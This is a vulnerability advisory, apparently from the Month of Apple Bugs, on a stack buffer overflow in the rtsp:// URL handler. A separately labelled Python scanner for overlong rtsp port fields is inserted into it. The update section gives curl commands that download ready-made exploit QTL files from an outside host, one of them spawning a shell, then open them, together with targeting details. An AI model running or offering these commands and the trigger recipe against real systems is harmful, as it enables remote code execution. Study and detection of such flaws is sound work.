A vulnerability exists in the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// + [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using HTML, JavaScript or a QTL file as the attack vector, leading to an exploitable remote arbitrary code execution condition.

For further information:
- Details, debugging information and exploitation notes.
- Working exploit: MOAB-01-01-2007.rb
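As an added defender-side example (not part of the original advisory or the MOAB exploit), the following Python scans HTML, JavaScript or QTL text for rtsp:// URLs whose port field is overlong or non-numeric, which is the shape of the trigger string described above. The regular expression, the length thresholds and the two sample documents are assumptions constructed here; the harmless run of 'A'/'B' bytes stands in for the padding and payload and carries nothing executable.

```python
import re
from typing import List, Tuple

# Matches an rtsp:// URL up to the first whitespace or HTML/attribute delimiter.
# Assumption: crafted URLs in HTML, JavaScript or QTL sit inside quoted attributes or string literals.
RTSP_URL_RE = re.compile(r"rtsp://([^\s'\"<>]+)", re.IGNORECASE)

# Assumption: no legitimate port field is longer than this; a real port is at most 5 digits.
MAX_PORT_FIELD_LEN = 64
# Longest hostname:port a DNS name can produce (253-character name limit plus ":65535").
MAX_AUTHORITY_LEN = 253 + len(":65535")


def check_rtsp_url(url_body: str, max_port_len: int = MAX_PORT_FIELD_LEN) -> Tuple[bool, str]:
    """Classify the part of an rtsp URL that follows 'rtsp://'.

    Returns (suspicious, reason). The trigger described in the advisory is
    host + ':' + a very long run of bytes, so the checks focus on the port
    field: its length and whether it is numeric.
    """
    authority = url_body.split("/", 1)[0]  # everything before the path
    if ":" not in authority:
        if len(authority) > MAX_AUTHORITY_LEN:
            return True, f"authority is {len(authority)} bytes long"
        return False, "no port field"
    _host, port_field = authority.split(":", 1)
    if len(port_field) > max_port_len:
        return True, f"port field is {len(port_field)} bytes long"
    if not port_field.isdigit():
        return True, "port field is not numeric"
    return False, "ok"


def scan_text(text: str, max_port_len: int = MAX_PORT_FIELD_LEN) -> List[Tuple[str, str]]:
    """Return every suspicious rtsp:// URL in an HTML, JavaScript or QTL document as (url, reason)."""
    findings = []
    for m in RTSP_URL_RE.finditer(text):
        suspicious, reason = check_rtsp_url(m.group(1), max_port_len)
        if suspicious:
            findings.append((m.group(0), reason))
    return findings


# Constructed sample documents (not from the advisory): one benign link and one
# link shaped like the trigger, with harmless 'A' bytes standing in for padding.
OVERLONG = "A" * 300
SAMPLE_HTML = (
    '<html><body>\n'
    '<a href="rtsp://media.example.com:554/live/stream1">benign link</a>\n'
    '<embed src="rtsp://a:' + OVERLONG + '" type="video/quicktime">\n'
    '</body></html>\n'
)
# A QTL file is an XML document whose <embed src="..."> names the media URL (constructed sample).
SAMPLE_QTL = (
    '<?xml version="1.0"?>\n'
    '<?quicktime type="application/x-quicktime-media-link"?>\n'
    '<embed src="rtsp://x:' + "B" * 299 + '" autoplay="true" />\n'
)

if __name__ == "__main__":
    for name, doc in (("html", SAMPLE_HTML), ("qtl", SAMPLE_QTL)):
        for url, reason in scan_text(doc):
            print(f"{name}: {reason}: {url[:40]}...")
```

The benign stream URL passes because its port field is a short run of digits; both constructed samples are flagged on port-field length alone, so the scan never has to look at what the padding contains. The thresholds are deliberately loose: a mail gateway or proxy would tune `MAX_PORT_FIELD_LEN` down, and content that embeds the URL in a JavaScript string built at runtime would need the string reassembled before scanning.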
Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via /usr/bin/say, and expects the command string to be located at 0x17a053c, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:
$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl